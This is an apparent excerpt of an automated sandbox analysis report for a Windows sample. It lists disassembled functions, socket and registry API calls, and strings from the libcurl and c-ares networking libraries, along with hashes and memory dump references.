1601->1594 1604->1588 1605->1604 1609 68079c-6807c2 call 6776a0 1605->1609 1606->1567 1621 680a87-680a97 call 686df0 1606->1621 1609->1604 1612->1567 1613->1596 1617 680854-68085f 1613->1617 1619 680970-680975 1615->1619 1620 680893-6808b1 1615->1620 1617->1615 1623 680a19-680a2c 1619->1623 1624 68097b-680989 call 6770b0 1619->1624 1625 6808c8-6808f7 1620->1625 1621->1567 1623->1589 1624->1623 1633 68098f-68099e 1624->1633 1631 6808f9-6808fb 1625->1631 1632 6808fd-680925 1625->1632 1634 680928-68093f 1631->1634 1632->1634 1635 6809b0-6809c1 call 6770d0 1633->1635 1641 6808b3-6808c2 1634->1641 1642 680945-68096b 1634->1642 1639 6809a0-6809ae call 6770e0 1635->1639 1640 6809c3-6809c7 1635->1640 1639->1623 1639->1635 1643 6809e8-680a03 WSAEnumNetworkEvents 1640->1643 1641->1619 1641->1625 1642->1641 1645 6809d0-6809e6 WSAEventSelect 1643->1645 1646 680a05-680a17 1643->1646 1645->1639 1645->1643 1646->1645
                                    APIs
                                    • WSAEventSelect.WS2_32(?,?,?), ref: 00680712
                                    • WSAEventSelect.WS2_32(?,?,00000000), ref: 006809DD
                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 006809FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: EventSelect$EnumEventsNetwork
                                    • String ID: N=g$multi.c
                                    • API String ID: 2170980988-2787237885
                                    • Opcode ID: c30de06339d535dbdc0e69f793e582270f534cbb2647b04a44b2ef6e40440331
                                    • Instruction ID: f4912c1e3d345d7b63b424393806aa0cefb85558db551223eb0aa3d1f097cd93
                                    • Opcode Fuzzy Hash: c30de06339d535dbdc0e69f793e582270f534cbb2647b04a44b2ef6e40440331
                                    • Instruction Fuzzy Hash: B3D1BFB16083019FFB50EF64C881BAB77EABF94304F044E2CF98592252E775E949CB52
                                    Function 0073B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                    Download Yara Rule
                                    APIs
                                    • getsockname.WS2_32(-00000020,-00000020,?), ref: 0073B2B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID: ares__sortaddrinfo.c$cur != NULL
                                    • API String ID: 3358416759-2430778319
                                    • Opcode ID: f59fe60d7781305da6e107e1f430d77ff4f3a9ac570700167cbdc9b061a6715f
                                    • Instruction ID: 219c894d1bb95f02e6d11966cec84c77f1ff186f0f0ef855db130b2bcbe42c9a
                                    • Opcode Fuzzy Hash: f59fe60d7781305da6e107e1f430d77ff4f3a9ac570700167cbdc9b061a6715f
                                    • Instruction Fuzzy Hash: ABC17E71604315DFE718DF24C885A6AB7E1FF88314F04896CEA898B3A2D739ED55CB81
                                    Function 00686FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1d39f90f643b93dc9d798319e2bb9893e860e9392148601ce74bedc674b05a1b
                                    • Instruction ID: 7b72c6e70e9b406f7c31b7af0ecdfa33133f7926d181b0eae0ba6800910c5ffd
                                    • Opcode Fuzzy Hash: 1d39f90f643b93dc9d798319e2bb9893e860e9392148601ce74bedc674b05a1b
                                    • Instruction Fuzzy Hash: 2C91D23060D3094BD735AA2988947FAB2D6EBC4364F388B2CE8A9432D4E771DD41D792
                                    Function 0073A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                    Download Yara Rule
                                    APIs
                                    • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0072712E,?,?,?,00001001,00000000), ref: 0073A90C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: recvfrom
                                    • String ID:
                                    • API String ID: 846543921-0
                                    • Opcode ID: d07dee2c26e9527469d983ce8b82566c07757adabf903024ab58c64bb3b75f73
                                    • Instruction ID: 2e1f16de4c9853b15ca1f8051002a018523fbffc34b804056fd3d7eccf5f2cad
                                    • Opcode Fuzzy Hash: d07dee2c26e9527469d983ce8b82566c07757adabf903024ab58c64bb3b75f73
                                    • Instruction Fuzzy Hash: C1F01D75109348BFE2209F41DC45E6BBBEDFFC9754F05456DF998232119271AE10CAB2
                                    Function 0072A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0072AA19
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0072AA4C
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0072AA97
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0072AAE9
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0072AB30
                                    • RegCloseKey.KERNELBASE(?), ref: 0072AB6A
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0072AB82
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0072AC46
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0072AD0A
                                    • RegEnumKeyExA.KERNELBASE ref: 0072AD8D
                                    • RegCloseKey.KERNELBASE(?), ref: 0072ADD9
                                    • RegEnumKeyExA.KERNELBASE ref: 0072AE08
                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0072AE2A
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0072AE54
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0072AF63
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0072AFB2
                                    • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0072B072
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: QueryValue$Open$CloseEnum
                                    • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                    • API String ID: 4217438148-1047472027
                                    • Opcode ID: 3722d9475590e4c09b05cdecfc107331db11c136335595f55b19c2b7c3fce379
                                    • Instruction ID: d3b1991746eacf7428cbef8f5ba1ff3445c2e719725270f9575706f7bc7ab1cb
                                    • Opcode Fuzzy Hash: 3722d9475590e4c09b05cdecfc107331db11c136335595f55b19c2b7c3fce379
                                    • Instruction Fuzzy Hash: F672AFB1604351AFE720DB24EC85B6B77E8AF85700F14482CF985DB2A1E779E944CB63
                                    Function 006AA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                    Download Yara Rule
                                    APIs
                                    • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 006AA832
                                    Strings
                                    • cf_socket_open() -> %d, fd=%d, xrefs: 006AA796
                                    • @, xrefs: 006AAC42
                                    • Local port: %hu, xrefs: 006AAF28
                                    • Could not set TCP_NODELAY: %s, xrefs: 006AA871
                                    • bind failed with errno %d: %s, xrefs: 006AB080
                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 006AA6CE
                                    • Couldn't bind to '%s' with errno %d: %s, xrefs: 006AAE1F
                                    • Local Interface %s is ip %s using address family %i, xrefs: 006AAE60
                                    • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 006AAD0A
                                    • @, xrefs: 006AA8F4
                                    • Bind to local port %d failed, trying next, xrefs: 006AAFE5
                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 006AADAC
                                    • cf-socket.c, xrefs: 006AA5CD, 006AA735
                                    • Trying [%s]:%d..., xrefs: 006AA689
                                    • Trying %s:%d..., xrefs: 006AA7C2, 006AA7DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: setsockopt
                                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                    • API String ID: 3981526788-2373386790
                                    • Opcode ID: c6fc34f5be12cc443941624e74f6af5c609c818fcf79d1022b9cb5acac9184fd
                                    • Instruction ID: aefe1e6b949c12c7e9385d9c23994a5cd73745eb8d04bb0e3e228fd228947064
                                    • Opcode Fuzzy Hash: c6fc34f5be12cc443941624e74f6af5c609c818fcf79d1022b9cb5acac9184fd
                                    • Instruction Fuzzy Hash: BE62E471504341ABE721AF54C846BEBB7E6BF82314F04492EF98897292E771EC45CB93
                                    Function 00739740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 981 739740-73975b 982 739780-739782 981->982 983 73975d-739768 call 7378a0 981->983 985 739914-73994e call 9f8b70 RegOpenKeyExA 982->985 986 739788-7397a0 call 9f8e00 call 7378a0 982->986 992 7399bb-7399c0 983->992 993 73976e-739770 983->993 996 739950-739955 985->996 997 73995a-739992 RegQueryValueExA RegCloseKey call 9f8b98 985->997 986->992 999 7397a6-7397c5 986->999 994 739a0c-739a15 992->994 998 739772-73977e 993->998 993->999 996->994 1011 739997-7399b5 call 7378a0 997->1011 998->986 1004 739827-739833 999->1004 1005 7397c7-7397e0 999->1005 1007 739835-73985c call 72e2b0 * 2 1004->1007 1008 73985f-739872 call 735ca0 1004->1008 1009 7397e2-7397f3 call 9f8b50 1005->1009 1010 7397f6-739809 1005->1010 1007->1008 1022 7399f0 1008->1022 1023 739878-73987d call 7377b0 1008->1023 1009->1010 1010->1004 1021 73980b-739810 1010->1021 1011->992 1011->999 1021->1004 1027 739812-739822 1021->1027 1026 7399f5-7399fb call 735d00 1022->1026 1028 739882-739889 1023->1028 1036 7399fe-739a09 1026->1036 1027->994 1028->1026 1032 73988f-73989b call 724fe0 1028->1032 1032->1022 1039 7398a1-7398c3 call 9f8b50 call 7378a0 1032->1039 1036->994 1045 7399c2-7399ed call 72e2b0 * 2 1039->1045 1046 7398c9-7398db call 72e2d0 1039->1046 1045->1022 1046->1045 1051 7398e1-7398f0 call 72e2d0 1046->1051 1051->1045 1056 7398f6-739905 call 7363f0 1051->1056 1061 739f66-739f7f call 735d00 1056->1061 1062 73990b-73990f 1056->1062 1061->1036 1064 739a3f-739a5a call 736740 call 7363f0 1062->1064 1064->1061 1070 739a60-739a6e call 736d60 1064->1070 1073 739a70-739a94 call 736200 call 7367e0 call 736320 1070->1073 1074 739a1f-739a39 call 736840 call 7363f0 1070->1074 1085 739a16-739a19 1073->1085 1086 739a96-739ac6 call 72d120 1073->1086 1074->1061 1074->1064 1085->1074 1087 739fc1 1085->1087 1092 739ae1-739af7 call 72d190 1086->1092 1093 739ac8-739adb call 72d120 1086->1093 1089 739fc5-739ffd call 735d00 call 72e2b0 * 2 1087->1089 1089->1036 1092->1074 1100 739afd-739b09 call 724fe0 1092->1100 1093->1074 1093->1092 1100->1087 1105 739b0f-739b29 call 72e730 1100->1105 1110 739f84-739f88 1105->1110 1111 739b2f-739b3a call 7378a0 1105->1111 1113 739f95-739f99 1110->1113 1111->1110 1118 739b40-739b54 call 72e760 1111->1118 1115 739fa0-739fb6 call 72ebf0 * 2 1113->1115 1116 739f9b-739f9e 1113->1116 1128 739fb7-739fbe 1115->1128 1116->1087 1116->1115 1124 739f8a-739f92 1118->1124 1125 739b5a-739b6e call 72e730 1118->1125 1124->1113 1131 739b70-73a004 1125->1131 1132 739b8c-739b97 call 7363f0 1125->1132 1128->1087 1137 73a015-73a01d 1131->1137 1140 739c9a-739cab call 72ea00 1132->1140 1141 739b9d-739bbf call 736740 call 7363f0 1132->1141 1138 73a024-73a045 call 72ebf0 * 2 1137->1138 1139 73a01f-73a022 1137->1139 1138->1089 1139->1089 1139->1138 1150 739f31-739f35 1140->1150 1151 739cb1-739ccd call 72ea00 call 72e960 1140->1151 1141->1140 1159 739bc5-739bda call 736d60 1141->1159 1153 739f40-739f61 call 72ebf0 * 2 1150->1153 1154 739f37-739f3a 1150->1154 1167 739ccf 1151->1167 1168 739cfd-739d0e call 72e960 1151->1168 1153->1074 1154->1074 1154->1153 1159->1140 1170 739be0-739bf4 call 736200 call 7367e0 1159->1170 1171 739cd1-739cec call 72e9f0 call 72e4a0 1167->1171 1180 739d53-739d55 1168->1180 1181 739d10 1168->1181 1170->1140 1187 739bfa-739c0b call 736320 1170->1187 1192 739d47-739d51 1171->1192 1193 739cee-739cfb call 72e9d0 1171->1193 1185 739e69-739e8e call 72ea40 call 72e440 1180->1185 1182 739d12-739d2d call 72e9f0 call 72e4a0 1181->1182 1208 739d5a-739d6f call 72e960 1182->1208 1209 739d2f-739d3c call 72e9d0 1182->1209 1211 739e90-739e92 1185->1211 1212 739e94-739eaa call 72e3c0 1185->1212 1201 739c11-739c1c call 737b70 1187->1201 1202 739b75-739b86 call 72ea00 1187->1202 1197 739dca-739ddb call 72e960 1192->1197 1193->1168 1193->1171 1215 739e2e-739e36 1197->1215 1216 739ddd-739ddf 1197->1216 1201->1132 1228 739c22-739c33 call 72e960 1201->1228 1202->1132 1223 739f2d 1202->1223 1238 739dc2 1208->1238 1239 739d71-739d73 1208->1239 1209->1182 1235 739d3e-739d42 1209->1235 1213 739eb3-739ec4 call 72e9c0 1211->1213 1232 739eb0-739eb1 1212->1232 1233 73a04a-73a04c 1212->1233 1213->1074 1241 739eca-739ed0 1213->1241 1221 739e38-739e3b 1215->1221 1222 739e3d-739e5b call 72ebf0 * 2 1215->1222 1224 739e06-739e21 call 72e9f0 call 72e4a0 1216->1224 1221->1222 1230 739e5e-739e67 1221->1230 1222->1230 1223->1150 1264 739e23-739e2c call 72eac0 1224->1264 1265 739de1-739dee call 72ec80 1224->1265 1251 739c66-739c75 call 7378a0 1228->1251 1252 739c35 1228->1252 1230->1185 1230->1213 1232->1213 1244 73a057-73a070 call 72ebf0 * 2 1233->1244 1245 73a04e-73a051 1233->1245 1235->1185 1238->1197 1246 739d9a-739db5 call 72e9f0 call 72e4a0 1239->1246 1249 739ee5-739ef2 call 72e9f0 1241->1249 1244->1128 1245->1087 1245->1244 1279 739db7-739dc0 call 72eac0 1246->1279 1280 739d75-739d82 call 72ec80 1246->1280 1249->1074 1274 739ef8-739f0e call 72e440 1249->1274 1270 73a011 1251->1270 1271 739c7b-739c8f call 72e7c0 1251->1271 1259 739c37-739c51 call 72e9f0 1252->1259 1259->1132 1292 739c57-739c64 call 72e9d0 1259->1292 1285 739df1-739e04 call 72e960 1264->1285 1265->1285 1270->1137 1271->1132 1294 739c95-73a00e 1271->1294 1290 739ed2-739edf call 72e9e0 1274->1290 1291 739f10-739f26 call 72e3c0 1274->1291 1296 739d85-739d98 call 72e960 1279->1296 1280->1296 1285->1215 1285->1224 1290->1074 1290->1249 1291->1290 1307 739f28 1291->1307 1292->1251 1292->1259 1294->1270 1296->1238 1296->1246 1307->1087
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00739946
                                    • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00739974
                                    • RegCloseKey.KERNELBASE(?), ref: 0073998B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                    • API String ID: 3677997916-615551945
                                    • Opcode ID: 6577b67d770a4908756ed02aa39f6afb5247ea177e2e93424428d150d9d6a511
                                    • Instruction ID: 8ce6a6318997c51c36ec661a64638b8f924cebac3df72765d94f5cac218297e4
                                    • Opcode Fuzzy Hash: 6577b67d770a4908756ed02aa39f6afb5247ea177e2e93424428d150d9d6a511
